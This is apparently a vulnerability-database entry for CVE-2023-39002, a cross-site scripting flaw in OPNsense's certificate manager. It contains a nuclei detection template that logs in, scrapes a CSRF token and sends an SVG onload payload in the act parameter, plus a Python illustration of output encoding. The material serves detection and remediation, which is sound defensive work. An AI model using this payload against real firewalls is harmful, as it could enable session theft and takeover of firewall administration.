OPNsense - Cross-Site Scripting

04 Jul 2026 03:00:48 · Reported by ProjectDiscovery · Type: nuclei · Source: github.com

An XSS vulnerability in OPNsense before 23.7 allows execution of arbitrary web scripts or HTML via a crafted payload.

Related

Reporter | Title | Published | Family
ATTACKERKB | CVE-2023-39002 | 9 Aug 2023 19:15 | attackerkb
Circl | CVE-2023-39002 | 9 Aug 2023 22:15 | circl
CNNVD | Deciso OPNsense Cross-Site Scripting Vulnerability | 9 Aug 2023 00:00 | cnnvd
CVE | CVE-2023-39002 | 9 Aug 2023 00:00 | cve
Cvelist | CVE-2023-39002 | 9 Aug 2023 00:00 | cvelist
NCSC | Vulnerabilities fixed in OPNSense | 11 Aug 2023 00:00 | ncsc
NVD | CVE-2023-39002 | 9 Aug 2023 19:15 | nvd
Prion | Cross site scripting | 9 Aug 2023 19:15 | prion
Positive Technologies | PT-2023-26728 · Opnsense · Opnsense Community Edition +1 | 9 Aug 2023 00:00 | ptsecurity
RedhatCVE | CVE-2023-39002 | 23 May 2025 05:43 | redhatcve

Code

id: CVE-2023-39002

info:
  name: OPNsense - Cross-Site Scripting
  author: Herry
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
  impact: |
    Authenticated attackers can inject malicious JavaScript through the act parameter in system_certmanager.php to steal OPNsense administrator session cookies and gain control of the firewall configuration.
  remediation: |
    Update OPNsense to version 23.7 or later that properly sanitizes the act parameter in system_certmanager.php and encodes output to prevent XSS attacks.
  reference:
    - https://logicaltrust.net/blog/2023/08/opnsense.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39002
    - https://github.com/opnsense/core/commit/a4f6a8f8d604271f81984cfcbba0471af58e34dc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39002
    cwe-id: CWE-79
    epss-score: 0.01162
    epss-percentile: 0.63352
    cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: opnsense
    product: opnsense
    shodan-query:
      - title:"OPNsense"
      - http.title:"opnsense"
    fofa-query: title="opnsense"
    google-query: intitle:"opnsense"
  tags: cve2023,cve,opnsense,xss,authenticated,rce,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1

      - |
        GET /system_certmanager.php?act=%22%3E%3Csvg/onload=alert(document.domain)%3E&id=0 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          # must reflect the payload actually sent in request 3 (alert(document.domain))
          - 'value=""><svg/onload=alert(document.domain)> "/>'

      - type: word
        part: header_3
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: para
        part: body
        group: 1
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true

      - type: regex
        name: value
        part: body
        group: 2
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true
# digest: 490a00463044022059e56d852f499997649ca561a415348beabefa7bbcfb87dee8810bedca28ffcf0220055160c883b1f9c1f3ee4694897a9a8ba02208ca6ffb8be6b7a9ca1cf32f3ff8:922c64590222798bb761d5b6d8e72950
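
As an added illustration (not part of the template above or of OPNsense's own code), the following Python models the condition the body_3 matcher keys on, a probe value echoed verbatim inside an HTML attribute, next to the output encoding the remediation describes. The hidden-input rendering is an assumed simplification of system_certmanager.php, not its actual source.

```python
import html
import re

# Constructed probe: the URL-decoded act value the template's third request
# sends. Assumption: the pre-23.7 page echoed act into an <input value="...">.
PAYLOAD = '"><svg/onload=alert(document.domain)>'

# Tag names a browser tokenizer would see in a fragment.
TAG_RE = re.compile(r"<([a-zA-Z][a-zA-Z0-9]*)")


def render_unescaped(act):
    """Model of the vulnerable behaviour: act is interpolated verbatim."""
    return '<input type="hidden" name="act" value="%s"/>' % act


def render_escaped(act):
    """Hardened rendering: attribute-encode act before interpolation
    (the equivalent of PHP's htmlspecialchars with ENT_QUOTES)."""
    return '<input type="hidden" name="act" value="%s"/>' % html.escape(act, quote=True)


def reflection_kind(body, value):
    """Classify how a probe value came back in a response body:
    'unescaped' when it appears verbatim (what the template's word matcher
    looks for), 'escaped' when only its entity-encoded form is present,
    'absent' otherwise."""
    if value in body:
        return "unescaped"
    if html.escape(value, quote=True) in body:
        return "escaped"
    return "absent"


def tag_names(rendered):
    """Tags the tokenizer would emit; anything after 'input' means the
    attribute value broke out of its quotes."""
    return TAG_RE.findall(rendered)


if __name__ == "__main__":
    for label, page in (("vulnerable", render_unescaped(PAYLOAD)),
                        ("hardened", render_escaped(PAYLOAD))):
        print(label, reflection_kind(page, PAYLOAD), tag_names(page))
```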

Vulners AI Score: 6.5 (Medium risk, current as of 04 Feb 2026 07:00)
CVSS 3.1: 6.1
EPSS: 0.01162